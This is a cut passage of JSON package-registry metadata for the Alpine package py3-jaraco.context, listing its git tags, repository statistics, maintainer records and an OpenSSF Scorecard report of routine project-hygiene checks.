v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.650Z","dependent_packages_count":5,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":6.674525653980015,"stargazers_count":25.710115639384757,"forks_count":25.541708768384417,"average":14.481587515437297},"purl":"pkg:apk/alpine/py3-jaraco.context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.17","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-jaraco.context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":1951,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2023-02-01T07:25:55.423Z","updated_at":"2023-02-01T07:25:55.423Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.17","url":"https://pkgs.alpinelinux.org/packages?branch=v3.17","ecosystem":"alpine","default":false,"packages_count":17817,"maintainers_count":352,"namespaces_count":2,"keywords_count":3375,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1065},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.642Z","updated_at":"2026-08-24T05:06:44.447Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/namespaces"}},{"id":7779024,"name":"py3-jaraco.context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2023-04-19T14:25:59.000Z","latest_release_published_at":"2023-04-19T14:25:59.000Z","latest_release_number":"4.3.0-r1","last_synced_at":"2026-07-27T20:02:07.106Z","created_at":"2023-05-22T14:27:16.366Z","updated_at":"2026-08-06T19:26:18.650Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.18/community/x86_64/py3-jaraco.context","install_command":"apk add py3-jaraco.context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifes